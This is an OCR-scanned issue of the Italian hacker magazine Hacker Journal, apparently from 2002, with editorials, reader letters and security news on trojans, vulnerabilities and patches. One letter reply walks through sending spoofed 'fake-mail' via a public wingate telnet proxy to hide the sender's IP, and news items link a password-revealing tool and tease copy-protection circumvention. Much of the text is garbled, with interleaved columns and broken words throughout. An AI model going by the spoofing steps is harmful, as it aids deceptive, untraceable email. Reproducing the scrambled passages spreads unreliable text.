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II primo numero passerà alla storia 
molte cose, alcune divertenti, altre meno, 
quanto mi riguarda ho sorriso a una le' 
che ci chideva se con "tutti 'sti teschi si 
un'agenzia di necrofori o facciamo gioì 
IL". Buona la seconda, anche se tutto s_„ 
moto l'idea del necroforo non è da scartare a 
priori. In realtà il teschio è evidentemente una 
provocazione che punta a solleticare le cor ' 
dell'ironia. Qualcuno è stato al gioco, quaì 
altro si è risentito, forse non cogliendo la ve 
ironica. Intendiamoci: noi vogliamo fare 
giornale serio, con contenuti attendibili 
vogliamo anche, concedetecelo, divertirci 
po'. Altrimenti andavamo a lavorare in b 
ca... Poi, come accade in un disco, voglio 
graziare chi ci ha dato una mano: Bisma 
Onda Quadra, Securitylnfos e tutto il pano 
ma underground in generale: grazie di cuo 
Ah, dimenticavo, questo è comunque un o 
mo "disco" da gustare fino un fondo... 

bomber78@hackerjourna 



Ormai sapete dove e come trovarci, appena I 
possiamo rispondiamo a tutti , anche a quel li | 
incazzati. Parola di hackers. 
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hack'er (hàk'ar) 

"Persona che si diverte ad esplorare i dettagli dei sistemi 
di programmazione e come espandere 

le loro capacità, a differenza di molti urliti, che prefextecono ^T^mJfO^Ì? 
imparare solamente il mìnimo necessaria" SOI 




(fra schiaffi e applausi) 
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OUT! 



due; con più calma, passa- T che ci ha gratificato. Più tecnica, dunque, più op- 
ta la sbornia del primo im- T profondi menti. Abbiamo forse peccato di ingenui- 
patto, siamo qui a leggere il 1 tà: non ci aspettavamo una reazione così netta e 
secondo numero del nostro ^rlécisa da parte della rete. Forum, guestbooks e 
giornale. Di cose ne son^^ canali di chat sono letteralmente esplosi. E come 



successe tante, e altre ne succederanno: un mer- 
coledì mattina mi sono alzato, ho acceso il PC, e 
mi è bastato dare un'occhiata alla posta e a qual- 
che sito per rendermi conto che, con tutta proba- 



avevamo intuito, la parola "hacker", è stata presa 
di mira e divenuta nodo di equivoci e litigate. Ma 
dare una mescolata alle carte, creare movimento, 
jwssa anche per decisioni azzardate. Abbiamo tra 



bilità, avevamo "fatto il botto". Con tutto ciò chesLle mani uno strumento di enorme potenzialità: 



comporta, è chiaro: non sono esperto di editoria, Bt( 
ma conosco il web e le sue manie, la sua efficacia ^Fo 
e la sua velocità. Essere la prima rivista italiana a rj 
trattare certi argomenti si portava dentro la prò- Ij, 
messa di polemiche, reazioni e affanni da parte di a 
una comunità che per sua natura è attenta ed esi- ■' te 



'raggiungere tante persone con un mezzo carta- 
ceo, così differente da quello digitale, è un'espe- 
rienza esaltante ma piena di responsabilità. Mol- 
l£^ anche tra coloro che lavora no/smanetta no da 
anni, hanno criticato non tanto i contenuti, quan- 
to l'immagine e la "facciata": opinioni che nasco- 



gente, pronta a dire la sua, e ci tiene a che la prò- no da chi ha già esperienza e conosce a menadi- 
pria voce sia ascoltata dagli altri. Era chiaro chef to tutta la terminologia del settore. Proporsi in edi- 
sarebbero arrivati fischi e applausi: ma se abbia=B Ncola anziché su un sito impone stravolgimenti nel 
mo deciso di giocare comunque questa partita è * linguaggio: se si vuole fare divulgazione è neces- 
perché siamo convinti che ne valga la pena. Cer- sario usare parole che anche chi non bazzica abi- 



mo deciso di giocare comunque questa partita è 
perché siamo convinti che ne valga la pena. Cer- 
to, alle baggianate e alle stupidità gratuite non si 
farà mai il callo, ma tant'è: /dev/null. A tutti quel- 
li che invece ci hanno mosso critiche civili, anche 
pesanti e incazzate, ma costruttive, un enorme rin- 
graziamento. Perchè se già da questo numero ab- 
biamo migliorato, è anche grazie a chi ci ha som- 
merso di messaggi, email e telefonate. La richie- 
sta principale? Maggior specificità tecnica e credo 



tualmente su packetstormsecurity può recepire. Al- 
trimenti si fa qualcosa a uso e consumo di chi già 
è smaliziato e dentro l'ambiente, e che certamen- 
te non ha bisogno di Hacker Journal. Per tutti gli 
altri, i curiosi, quelli che sono coscienti di avere an- 
cora da imparare, cercheremo di affrontare argo- 
menti via via più specifici e tecnici. Come sta scrit- 
to sui cartelli delle autostrade: stiamo lavorando 



che siamo sulla buona strada. E anche qui un*, fc_per voi. Con HJ vogliamo colmare un buco: of- 



enorme aiuto lo ha dato la comunità, intasando 



fri re un appoggio a chi si interessa di questi ar- 



ie nostre caselle con idee, articoli e suggerimenti*"* gomenti, soddisfare la curiosità di chi si avvicina 
preziosi. Abbiamo ottenuto la collaborazione efr* per la prima volta al mondo underground. Non 
personaggi importanti del panorama under- I ci interessano le lezioni morali; manifesti e "re- 
ground, così come di gruppi di appassionati^ di gole per essere un hacker" le lasciamo a chi ha 
singoli che hanno deciso che questa cosa può ■ voglia di dedicarsi a politica e filosofia, noi vo- 
avere un suo senso e una sua utilità: questo, più^J gnamo solo appassionare... A sentirci gente! 
dei complimenti che abbiamo ricevuto, è stato ciò -fi caruso _cavallo@hackerjoumal.it - ICQ n° 66876309 



Uhi GIORNALE PER TUTTI 





MIO HACKING HARD HACKING 

Il mondo Hack è fattajf alcune cose facili e tante 4*4» difficili. Scrivere di Hacking non è invece per nul- 
la facile: ci sono curiosi, lettori alle prime armi (si fa per dire) e smanettoni per i quali il computer non 
ha segreti. Ogni articolo di Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co- 
mincia), MIDHACKING (per chi c'è già dentro) e '^ VCKINC (per chi mangia pane e worm). 



~ 


2 | www.hackerjournal.it 



DAY AFTER 



men 




Ora comincia la sfida 




Gymnasium la palestra di 
HJ: la "raccolta delle fir- 
me" per allestire il vostro 
server/palestra è andata 
al di là di ogni più rosea 
aspettativa. 
Il progetto pia- 
ce pratica- 



i u 



mente a tutti, specie al- 
l'amministratore dele- 
gato (nella foto), quindi 
stiamo provvedendo ad 
allestirlo in tempi brevi 
per permettervi 
di sperimen- 




BUCAMI 



£ 




Entrate e 



fin 



i ■§■ n n I n ci •? ■"■ 



TUfarriJ. 



*rv> 



prima e ricco di tante cosette simpati- 
che. Vi inviatamo a frequentare la 
Chat che è molto affollata in questo 
periodo e la pagina dei Tutorial, sem- 
pre più gettonata, che sta crescendo 
anche grazie ai vostri contributi. Na- 
vigatelo senza risparmiarvi e non 
mancate di segnare il Book... 



TESCHI SI... 

"Ragazzi la cover 
è davvero forte 
continuate così..." 
"C***o bello! 
Mettetene altri 
arredano la 
cameretta da D**" 



ONO? 
"Cos'è 1 
una 
rivista 
di necrofori?" 
"Vanno bene per i 
ragazzini di 1 3 anni 
forse neanche per 
loro... "Bella caz***a" 



Occhio! 

Alla uri del nostro 



nttp://www. 
iackerjournal.it/ 
?tzone 



lettori di HJ, biso- 
gna autenticarsi: 

user: 
password: 



Il PROSSIMO 
NUMERO IN EDICOLA 

il 20 GIUGNO: 

0GKI 14 GIORNI 

IL GIOVEDÌ 



^HflÉ ^ei big 
2É !3 Giù k) 
A l2Bolog k 
IO -I Lenin ilogn 




uinta ■Bell 

'ced 
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hackmee- 

i anche 

in un 




Un sito per me molto bello bello è: 
www.cracks.am http://www.cracks.am 

fbi37 



Sono il fondatore di UmxRemote 
Lab (www.unix.remotelab.org), un labora- 
torio virtuale dedicato al mondo Unix. Al 
momento è disponibile un documento che 
introduce Unix. (http://www.unix.remote- 
lab.org/unix/introduzione-unix/) 



http://www.hackernet. dalweb.it UN OTTI- 
MO SITO. INSERITELO TRA I VOSTRI LINK 

Net net 



1 4 Propongo un livello di difficoltà 
>*-*' per gli articoli tipo libri di cucina 



Complimenti complimenti complimenti 
complimenti complimenti complimenti 

cOre 



, i Noi hemm.. avremmo in lavora- 
ci- jjj zione un sito che tratta hacking 
inteso come sicurezza dei siste- 
mi, programmi open source, tutorial e ar- 
ticoli tutti scritti dalla nostra redazione. 
Se volete aggiungere tra i vostri link il 
nostro sito questo è l'indirizzo: 
http://www.hackeralliance.net 

[JARRET] 



...Ero solito litigare più con Windows 
che con la mia ragazza, ma da 
quando uso Linux lei ha riconquista- 
to il titolo... 



1 uogoTWB ■teatro Polivalente Oc- 

cupato (TPu^^wecn.org/tpo) (fl 

ra£ i precedenti , anche questo meeW 
Il autogestito e autofinanziato. ìwM 
Uponsor, né etichette. L'intera orga» 
Btecnico logistica viene portata arfM 
Hite l'anno da un collettivo vjBrJT 
^L si ritrova nella mail ir 
■^^rneeting@kyi 



. lo sono un ex. un ex hacker. 

Quando (12-14 anni fa circa) non 
f esistevano leggi a riguardo, non 

esisteva Internet (per come la si 
conosce oggi) e si "navigava" solo via Ita- 
Pack, FidoNet (esiste ancora oggi!!!), la rete 
VideoTel e tante BBS. Quando chi aveva un 
USRobotics a 9.600 bps o dopo qualche an- 
no a 1 4.400 con vari sistemi di compressione 
che lo portavano a più alte velocità era un 
Lord! Allora (nel senso di a quell'epoca) lo 
spirito era molto diverso. Si stava notti inte- 
re a cercare qualche backdoor di un sistema, 
si provavano NUI e NUA in ItaPack e si bo- 
xava (la serie di Blue, Red e Black box che 
generavano toni a multifrequenza per atti- 
vare linee telefoniche), lo sono stato consu- 
lente per le forze dell'ordine italiane e stra- 
niere, per reati informatici. Cose di un livello 
particolare, comunque! O dove l'uso dei 
mezzi informatici diventa passaggio di infor- 
mazioni sulla pedofilia o cose che chiunque 
con un po' di buon senso eliminerebbe. 
Quindi dite ai vostri lettori: Divertitevi, impa- 
rate, spaccate il culo al mondo, ma state at- 
tenti a non mettervi nei guai, e spiegate lo- 
ro che voi non siete hacker (non avreste mai 
fatto questa rivista), ma che la rivista può es- 
sere un mezzo per molti per conoscere i con- 
cetti e crescere assieme. 
Ciao, buon divertimento, e mi raccomando. 
Oggi fare danni è tanto facile... 

Roberto Capodieci 
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INONDATI 



CREW: ISTRUZIONI PER L'USO 

Ciao belli, complimenti per la rivista. 
Devo confessarvi che sono un neofita e 
non me ne vergogno affatto. Proprio 
per questo volevo farvi una domanda 
che forse è un po' imbarazzante tutti 
quelli che smanettano dalla mattina al- 
la sera. Che c***o sono 'ste crew di cui 
si parla nel giornale? 

Armageddon 

La traduzione dall'inglese è "equipag- 
gio" o, forse, piuttosto una "ciurma" se 
vogliamo rimanere in ambito piratesco. 
In pratica si tratta di gruppi di users che 
decidono di radunare forze e conoscen- 
ze per crescere sia come singoli che co- 
me comunità. Cosa fanno le Crew? Beh 
dipende dalle finalità che le ispirano. Ci 
sono Crew assolutamente storiche e di 
fama riconosciuta che operano soprat- 
tutto sul fronte della sicurezza in tutte le 
sue sfaccettature, analizzando problemi 
e proponendo soluzioni. Altre sono più 
votate ad obiettivi di tipo "militare" at- 
taccando magari canali nella rete per 
ottenere prestigio e farsi pubblicità. Al- 
cune Crew sono strutturate con un gerar- 
chia di tipo militare con reclute (il livello 
più basso) e gradi via, via superiori. \tM 



DOLCI "BISCOTTINI" 

Leggo di Cookies che si installano sul PC 
ad insaputa dell'utente, vorrei sapere 
cosa sono e come eliminarli. Tank 

Ludus 

Un Cookie, o "biscottino" è un archivio 
trasmesso ad un web browser da un 
web server che è usato per registrare le 
sue attività su un Web site. Per esempio, 
quando comprate gli articoli da un luo- 
go e li disponete in un cosiddetto car- 
rello di shopping virtuale, quelle infor- 
mazioni sono memorizzate nel Cookies. 
Quando il browser chiede gli archivi 
supplementari, le informazioni del "bi- 
scotto" sono trasmesse di nuovo al ser- 
ver. I biscotti possono ricordarsi di altri 
generi di informazioni personali come la 
vostra parola d'accesso. Per gli utenti di 
Windows i biscottini si trovano nel file 
cookies.txt all'interno del browser di na- 
vigazione, basta eliminarlo di volta in 
volta. Gli utenti del Mac possono trovar- 
li seguendo il percorso: preferenze>ri- 
cezioniarchivi> cookie del browser, ba- 
sta evidenziarli e cancellarli. \ci 



Va bene! 

Due pagine di mailn ce ne sarebbero 
volute venti- Behi gli insulti non 
mancaceli ma l'uomoi quello vercn ha 
bisogno anche di insulti e pesciate 
in facciai e il redattore pure... 
Diciamo (stesso intercalare) 
che lo fortifica. E qui ad HJ siamo 
redattori strongn scriviamo su 
una tastiera da fachiro con 
delle puntine rovesciate al posto 
dei tasti- Perché siamo uomini veri- 
Diciamocelo. . . 

E a parte questoi adesso basta 
parlare di noin c'è la Rete che ci 
aspettai vediamo che cosa siete 



capaci di tare- 



POSTA ANONIMA 

Volevo sapere come inviare la posta na- 
scondendo il mio indirizzo IP. 

Lucifer 

L'argomento è molto più esteso e com- 
plesso di quello che possa sembrare. Si 
può scegliere un sito che consente di 
nascondere l'IP come punto di invio 
della e-mail, come descritto all'interno 
del giornale, oppure uno dei metodi 
più spiccioli è usare un wingate, ovve- 
ro un proxy per il telnet che come tutti i 
proxy fa comparire nei log del sistema 
a cui ci connettiamo il suo ip invece del 
nostro. 

La prima mossa è di cercare una li- 
sta di wingate pubblici, quindi l'opera- 
zione successiva consiste nel connetter- 
si in telnet ad uno di questi. L'output del 
wingate sarà di questo tipo: WinGate>. 

Subito dopo questo prompt dovete 
scrivere l'indirizzo del server di posta e 
la porta, come riportato qui sotto: Win- 
Gate> mail. tin.it 25. 

Lui si connetterà al server lasciando 
il suo ip al posto del nostro; a questo 
punto basta seguire le indicazioni pre- 
cedenti e spedire una semplice fake- 
mail. 

Unico problema potrebbe essere il 
non vedere l'output su schermo delle 
operazioni che facciamo; alcune volte 
infatti succede che noi usiamo tranquil- 
lamente il wingate ma appena ci con- 
nettiamo da lì sul server smtp non ri- 
usciamo a leggere ciò che noi scrivia- 
mo, mentre vediamo tranquillamente le 
risposte del server, in questi casi basta 



■ w fe a ^ 



fare tutto con calma, la miglior cosa 
da fare è prepararsi già prima il do- 
cumento e poi procedere con 
copia/incolla. H 

CORSO + PALESTRA 

Ma se l'hacker deve saper programma- 
re, scusate, ALMENO UN CORSO SU C E 
C++ lo trovo necessario, forse xchè io 
nn ne so un ca**o né di hacking né di 
programmazione? 

Cmq penso che la rivista dovrebbe 
contribuire alla realizzazione del sogno 
dei molti profani che la comprano, DI- 
VENTARE HACKER, quindi propongo ol- 
tre ad una sezione sulla programma- 
zione un ampliamento di quella della 
pratica (magari un po' a scapito delle 
pesanti news), però nel complesso è un 
ottima idea, in conclusione vi PREGO di 
metterci a disposizione al + presto 
GYMNASIUM il "SERVER/ PALESTRA". 
Grazie 

Etiope 

Per la palestra ci stiamo organizzando, 
l'idea piace anche a noi parecchio. 
L'argomento programmazione lo fac- 
ciamo nostro, cercheremo di acconten- 
tare te e altri lettori che in effetti ci 
hanno chiesto la stessa cosa, tì 

UN PO 7 DIFFICILE... 

Ciao Raga, ho trovato la rivista mol- 
to interessante, ma come primo nu- 
mero ritengo che sia veramente 
complessa, si va bene per chi ha già 
esperienza nel campo ma per chi è 
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la prima volta che si avvicina dovre- 
ste essere più chiari, insomma fare 
una rivista che possa essere letta an- 
che da chi di informatica e pirateria 
non ne capisce granché. 

Cmq complimenti avete creato 
qualcosa di serio spero che la prossi- 
ma uscita ci sia anche un Cd-rom al- 
legato come giuda... ciao a presto 

Maudit 56 

Ti daremo l'e-mail di "Etiope" così vi 
mettete d'accordo. ^cÀ 

LAVORI FORZATI 

Complimenti 300 anni di questa attivi- 
tà... clàùZ 

maximus 

300 anni di lavoro? È una minaccia? H 



PROGETTO XOOPS.6B6 

Sono alex da Vicenza volevo segna- 
larvi il mio ultimo progetto 
www.xoops.6b6.net che tratta di un 
programma Opensource che permette 
con pochi passaggi di creare un por- 
tale. 

Penso che la cosa possa interessa- 
re ai vostri lettori. Aspetto i vostri 
commenti. A presto 

Alex 

£ noi aspettiamo quelli dei lettori che 
sicuramente non mancheranno di te- 
stare il programma. \cÀ 

HACKERS, STORIE DI DISIN- 
FORMAZIONE QUOTIDIANA 

Ognuno ha la sua versione dei fatti e 
le proprie opinioni su questo scottan- 
te argomento, gli "hackers". lo vorrei 
partire dalla definizione ufficiale di 



BETA O PROGRAMMI? 



Sono un pò 7 perplesso sempre più 
spesso si trovano sul mercato pro- 
grammi che a poche settimane dal 
lancio necessitano di patch e contro- 
patch. 

Ma dico io: non potrebbero testarli un 
pò 7 meglio prima di metterli in vendi- 
ta, a volte sembra di avere a che fare 
con della vere e proprie beta. 

Lexus 




hacker, presa dal Jargon (il Dizionario 
della Rete, reperibile a http://www.tu- 
xedo.org/-esr/jargon/). Hacker viene 
definito come chi "ama esplorare i det- 
tagli di un sistema riprogrammabile e 
cerca di estenderne al massimo le pos- 
sibilità". 

Vi sono anche altre definizioni che 
lo intendono come "un esperto o entu- 
siasta di qualsiasi cosa", o come "chi 
apprezza le sfide mentali nel superare 
o aggirare creativamente barriere". 

L'ultima definizione, quella di "un 
individuo che cerca di scoprire infor- 
mazioni riservate" e' riferita al termi- 
ne "cracker"... 

Questi sono siti e libri sui quali e' 
possibile ritrovare alcune delle idee 
presenti in queste mie scarne righe. Ce 
ne sarebbero un'infinita , probabil- 
mente molto migliori. Questi sono 
quelli che più mi hanno ispirato. In- 
nanzitutto Jargon, il dizionario della 
Rete, con la sua precisa definizione di 
Hacker, di Etica Hacker e altri succu- 
lenti argomenti: 



In effetti molte società di software han- 
no la cattiva abitudine di lanciare pro- 
dotti ancora poco testati. Lo fanno per 
rispettare le scadenze di mercato e per 
uscire in contemporanea con la campa- 
gna pubblicitaria di lancio pianificata 
molto tempo prima. Risultato? E' sotto 
gli occhi di tutti: programmi e videogio- 
chi sono sempre più spesso instabili e 
necessitano di interventi postumi. \ti 



http://www.tuxedo.org/~esr/jar- 
gon/html/entry/hacker.html 

- La Electronic Frontier Foundation, 
organizzazione che da sempre difen- 
de i diritti dei cittadini in rete e la lo- 
ro privacy: http://www.eff.org 

- La GNU, movimento principale 
dell'Open Source, organizzazione alla 
base di molti fra i migliori (e gratuiti) 
software in circolazione: 

http://www.gnu.org 

Per quanto riguarda l'Italia, vorrei 
segnalare l'Associazione Culturale Te- 
lematica Metro Olografix: 
http://www.olografix.org 

- un altro link "chiave" della sicu- 
rezza italiana e' la mailing list 
www.sikurezza.org, http://www.siku- 
rezza.org 

I libri che considero migliori sono: 

- Hackers - gli eroi della rivoluzio- 
ne ("Hackers"), di Steven Levy. 

- Giro di vite contro gli hackers 
("The Hacker Crackdown"), di Bruce 
Sterling. 

- Spaghetti Hacker, di Stefano 
Chiccarelli e Andrea Monti 

(www.spaghettihacker.it) 

Lorenzo a.k.a. Kipple 

Accidenti, Lorenzo, le "scarne righe" 
come le definisci tu, bastavano da 
sole a riempire tutto lo spazio della 
posta. Ci siamo limitati a riportare le 
cose salienti soprattutto per i lettori. 
Adesso giriamo tutto questo agli altri e 
vediamo che ne pensano. Scrivi anco- 
ra, e, per te come per tutti gli altri, di- 
venta un nostro collaboratore: uno per 
tutti, tutti x hacking. r* 



www.hackerjournal.it 7 



NEWS i 



icrosofr 




^let 



O UN VIRUS 

TRAVESTITO DA FIX 

I yi molti sarà capitato di ricevere una e-mail con 
| i\ mittente Kaspersky Labs in cui viene propo- 
sto un fix per risolvere in modo definitivo e an- 
nientare il worm di Klex. 
La e-mail è identificabile perché contiene il se- 
guente soggetto: You're under a serious threat!. 
Il contagio avviene attraverso un collegamento 
ad un server remoto dove viene scaricato ad in- 
saputa dell'utente ignaro il Trojan horse "Smo- 
kedown" da un server remoto per poi installarlo 
sul PC. Il Trojan sfrutta una vulnerabilità di Inter- 
net Explorer che peraltro era già stata segnalata 
dalla stessa Maicrosoft qualche tempo fa e di 
cui si trovano tutte le specifiche all'indirizzo: 
http://www.microsoft.eom/technet/s 
ecurity/bulletin/MSOI -020.asp. Nel- 
l'immagine abbiamo "taroccato" M. Technet :). 
La patch che permette di sanare questo proble- 
ma si può scaricare liberamente dal sito: 
http://www.microsoft.com/win- 
dows/ie/downloads/critical/q2901 
8/default.asp. 1 

O HEAPOVERFLOW 
IN CACHEFSD 

/l demone cachefsd della Sun è installato di de- 
fault sui Sun Solaris 2.5.1, 2.6, 7 e 8 (sia SPARC 
che Intel). Esiste una vulnerabilità in cachefsd che 
permette a un utente di eseguire codice arbitrario 
con i privilegi di cachefsd, che di solito sono mot. 
Sono state rilasciate patch per risolvere questo 
problema. Per trovare la patch adeguata al vostro 
sistema consultate l'advisory sul sito del CERT al- 
l'indirizzo http://www.cert.org/adviso- 
ries/CA-2002-n.html.H 
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O RILASCIATA STEPHANIE PER OPENBSD 3.1 
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Stephanie è una serie di scripts per l'harde- 
ning di una openbsd box. 
Le patches per ÒpenBSD contenute in Stepha- 
nie hanno lo scopo di aumentare la sicurezza e 
la stabilità. Il suo utilizzo non è consigliato pro- 
prio per tutti gli utenti, ma se si ha una 



openbsd box con shell accounts per molti 
users l'impiego è sicuramente "una bella mos- 
sa" a tutti gli effetti. 

La nuova versione è facilmente e liberamente 
configurabile. 

In virtù di ciò è quindi possibile utilizzare le so- 
le funzionalità che ci interessano tralasciando 
quelle che vengono proposte nel pacchetto e 
che non fanno al caso nostro o che comunque 
non sono indispensabili per la configurazione 
che dobbiamo gestire. 

Stephaine può essere reperita in tutta tranquil- 
lità in rete. E' disponibile all'indirizzo internet: 
http://www.innu.org/~bricm/Stepha- 
nie/. 
Da cui può essere liberamente scaricata, m 



O DOCUMENTO SULLA CONFIGURAZIONE 
DI LINUX IN SICUREZZA 
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-stato reso disponibile un documento sulla 
configurazione di Linux in completa sicurezza 



dal titolo Linux Security Configuration Document. 
La notizia farà sicuramente felici i seguagi del 
pingunino che sembrano essere sempre più nu- 
merosi e che anche al nostro indirizzo di redazio- 
ne si fanno sentire. 

Del resto uno dei "probemi" di Linux è proprio la 
sicurezza delle migliaia di versioni circolanti, al- 
cune meno affidabili di altre. 
Il documento è reperibile presso il seguente in- 
dirizzo: 

http://www.intersectalliance.com/proj- 
ects/LinuxConfig/index.html. ti 



O VULNERABILITÀ CISCO SYSTEM IOS 



□ 



f x stata riscontrata una vulnerabilità nel si- 
stema operativo CISCO. 
Cisco IOS sarebbe affetto da una falla che ne 
causerebbe un Dos in seguito all'accettazione 
di particolari pacchetti ICMP. 
La falla in questione interessa una serie piut- 
tosto diffusa di sistemi che riportiamo di se- 
guito. 

Sistemi Vulnerabili: 

Cisco 1005 IOS 11.0 (18) 

Cisco 1603 IOS 1 1.3 (1 1b) 

Cisco 1603 IOS 12.0 (3) 

Cisco 2503 IOS 11.0 (22a) 

Cisco 2503 IOS 11.1 (24a) 



Tra i sistemi che non sono toccati dalla falla si 
segnalano invece: 

Sistemi non vulnerabili: 



Cisco 1603 


IOS 12.1 (11) 


Cisco 1603 


IOS 12.2 (5) 


Cisco 2503 


IOS 11.2 (26a) 


Cisco 2503 


IOS 11.3 (11b) 


Cisco 2503 


IOS 12.0 (19) 



Soluzione: 

Cisco ha rilasciato una soluzione momentanea 
nel frattempo che esca la patch: per gli utenti 
che hanno Cisco IOS 1 1 .x bloccare tutti gli ICMP 
redirect destinati al router. ai 
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O GABOUNA PER CONOSCERE LA POTENZA REALE □ 
DEL VOSTRO MAC! 



/I nuovo System X del Mac 
consente di conoscere il be 
mark della macchina su cui è 
tato con un semplice coma 
stuale eseguito dal terminal e 
la struttura tutta Unix del nuc 
operativo Macintosh. 
Il comando da digitare è: ope 
questo punto Darwin elabore 
di dati che corrispondono al 1 
il sistema impiega per criptai 
dei pacchetti dati. 
Minore è il tempo impiegate 
l'elaborazione dei dati, mag 
giore è la potenzialità del 




Mac. Quindi confrontan- 
Drocessi di elaborazione 
luter diversi se ne indivi- 
la differenza in termini di 
:to in modo intuitivo sen- 

ì ancora il System clas- 
lità di conoscere le pre- 
nfinata all'opzione Apple 
ofiler attivabile diretta- 
I menu "mela" e in grado 
tutte le specifiche tecni- 
\ssolutamente indispen- 
)ile se si acquista un 
Mac usato... Ei 



O SHOWPASSWORD PER "RECUPERARE" 
LA PASSWORD 



□ 



f A un simpatico programmino che pesa soltanto 
216 kb che sostituisce gli asterischi nei cam- 
pi password con la password in chiaro. 
Questo è molto utile (per esempio) se vi dimenti- 
cate la password della posta elettronica, ma l'a- 
vete registrata in Outlook o in qualsiasi altro pro- 
gramma che la rivela con gli asterischi. 
Ovviamente cercate di utilizzare questo program- 
ma con scopi LEGALI!!! 

Si può scaricare liberamente dal sito: 
http://ph14.virtualave.net/show- 
pass.zip. SI 
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O MELISSA: 20 MESI DI CARCERE AL SUO AUTORE □ 



n ^ s 






V 



Molti si ricorderanno del Virus Melissa che 
qualche tempo fa si diffuse in rete ad una 
velocità impressionante. 
Infatti una prerogativa di Melissa era proprio 
la rapidità di propagazione. Il contagio avveni- 
va attraverso una e-mail che riportava come 
oggetto un "messaggio importante" prove- 



niente da un amico, o comunque da una per- 
sona in possesso dell'indirizzo e-mail. Una vol- 
ta ricevuto il messaggio contenente Melissa, 
il Pc vittima inviava altri 50 messaggi infetta- 
ti ad altrettanti PC. 

Gli effetti del virus erano rappresentati da un 
inspiegabile rallentamento di sistema. 
Il suo autore David L. Smith, 33 anni, è stato 
condannato a 20 mesi di reclusione e una 
multa di circa 5.500 euro. Smith è da consi- 
derarsi la prima persona condannata per aver 
diffuso un Virus informatico. 
Da considerare che Melissa di per sé non ha 
mai intaccato o cancellato componenti di si- 
stema dei PC in cui si è propagato, né file di 
programmi. 

Tuttavia si stima che il danno arrecato dalla 
sua diffusione sia stato di circa 90 milioni 
di Euro! ^ 



4i 



O MICROSOFT CHAT 
È VULNERABILE... 
MA DAI! 

/I CERT (Centro di coordinamento per la si- 
curezza su Internet) ha rilevato una falla 
preoccupante in Microsoft MSN Chat. 
Si tratta di un buffer overflow che è contenu- 
to all'interno di un parametro di "ResDLL" resi- 
dente in un controllo ActiveX. 
Il problema grosso di questo controllo è che 
contiene la firma di Microsoft. Questo per- 
mette al browser (sempre che si stia utilizzan- 
do Internet Explorer) di scaricare il controllo in 
questo modo anche gli utenti di Internet Ex- 
plorer possono risultare affetti da questa vul- 
nerabilità. 

Questa vulnerabilità può consentire a fre- 
quentatori della rete malintenzionati di ese- 
guire del codice arbitrario utilizzando i privile- 
gi dell'utente che sta utilizzando il Messen- 
ger. Microsoft ha rilasciato un bollettino in 
cui spiega i problemi di questa vulnerabilità. 
Si tratta del Microsoft Security Bulletin 
MS02-022 che è possibile trovare a questo 
indirizzo: http://www.microsoft.com/tec 
hnet/security/bulletin/MS02-022.asp 
Il controllo in questione non viene installato 
di default su nessun sistema di Instant Mes- 
saging ma va scaricato e installato per vo- 
lontà dell'utente. 

Questo dovrebbe garantire una maggiore si- 
curezza. Allo stesso indirizzo del bolletino Mi- 
crosoft è possibile scaricare la patch in gra- 
do di risolvere il problema. 
Il consiglio e comunque di installare imme- 
diatamente la patch per sanare la vulnerabi- 
lità, perché se il rischio è relativamente bas- 
so per i sistemi Internet e Intranet, finisce 
per essere critico per i sistemi client che 
hanno una grandissima diffusione e che fini- 
scono per interessare un gran numero di 
utenti. « 
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O XBOX: EMULATORE 
DIABOLICO 

Devono stare attenti gli appassionati di X- 
Box, che smaniano dalla voglia di giocare 
i games della piattaforma Microsoft su PC at- 
traverso l'uso di un emulatore. 
Infatti attualmente in rete è disponibile pro- 
prio un emulatore di X-Box. 
Si tratta in realtà di un Trojan Horse destinato 
ad arricchire i relativi autori per mezzo del 
"pag-per-scatto" ed altri schemi di pubblicità 
on-line di questo tipo. 

Il programma "EMU_xbox.exe", una volta 
installato non consente di giocare ma produce 
soltanto messaggi di errore. 
Un realtà lo scopo è quello di installare sul "PC 
vittima" un portello posteriore NetBUIE.exe, 
che tenta silenziosamente di mettersi in con- 
tatto con i numerosi server a distanza della re- 
te di pubblicità in linea DoubleClick, almeno 
secondo un'analisi preliminare proveniente da 
TruSecure Corporation. 

Il programma fraudolento sembra dissipare il 
relativo nome da NetBEUI, che è ortografato 
diversamente e corrisponde all'interfaccia di 
utente aumentata NetBios, a un protocollo di 
rete standard di Windows. 
In uno sforzo ulteriore di impedire agli uten- 
ti infettati di rilevare o di disinstallare il por- 
tello posteriore, gli autori di NetBUIE.exe 
hanno dato agli attributi dell'archivio del pro- 
gramma un'aria di legittimità. 
Infatti il programma mostra un avviso di 
copyright di Microsoft ed è descritto come 
"programma di utilità di verifica del collega- 
mento di rete." 

NetBUIE.exe non è il primo emulatore bo- 
gus per colpire in Internet. 
In gennaio, un altro emulatore di Xbox fasul- 
lo, Emulator.0. 35.zip", era stato lanciato 
in rete. 

L'indirizzo dove potete trovare l'emulatore è: 
http://www.emulator-zone.com. « 



/N, 



3 VERMICELLO "PORCELLO" 



□ 




vjv 



MAX 2002 



«iella costellazione dei Worms, tanto varie- 
I II gata e simpatica, se ne segnala uno del 
tutto nuovo, non particolarmente dannoso e 
che sta raggiungendo, cosa a dire il vero que- 
sto è l'aspetto più preoccupante, discreti livelli 
di diffusione. 

Si chiama JS.Fortnight, la cosa più interessante 
e rilevante è il suo meccanismo di azione, il mo- 
do in cui si insinua nel computer vittima porten- 
do il suo carico infetto. Fortnight si comporta co- 



me un vero e proprio Ca- 
vallo di Troia che porta al 
suo interno un file che 
sostituisce la firma nei 
messaggi che l'utente, 
infettato, spedisce suc- 
cessivamente usando 
Outlook Express. 
Quindi una volta insedia- 
tosi nel PC il worm in 
questione è capace di 
propagarsi all'infinito an- 
dando a colpire tutte le 
persone comprese in un 
elenco di indirizzi. 
Una volta che si è instal- 
lato nel sistema, Fort- 
night cambia le prefe- 
renze dei browser di na- 
vigazione impostando 
come pagina iniziale di 
navigazione: rowto- 
cash.net e altri siti col- 
legati, siti a luci rosse 
dalle cui pagine viene sparato il worm vero 
e proprio. 

Il comportamento non è dissimile a quello di altri 
artifizi che hanno come scopo quello di condurre 
l'utenza su siti di chiaro contenuto pornografico a 
tutto vantaggio degli amministratori in cerca di 
profitti conitnui. Per penetrare all'initerno del PC 
il worm sfrutta una vulnerabilità di Microsoft 
VM Active X, una falla di cui non soffrono i si- 
stemi Microsoft pacchati. r* 



Z> "COPIARE" I CD CON UN PENNARELLO 



□ 



Ai on si tratta di disegnare, copiandolo, un bel 
III CD, ma di usare il pennarello per aggirare le 
protezioni introdotte dalle case discografiche 
quali Cactus Data Shield di Midbar e la Key2Au- 
dio di Sony. 

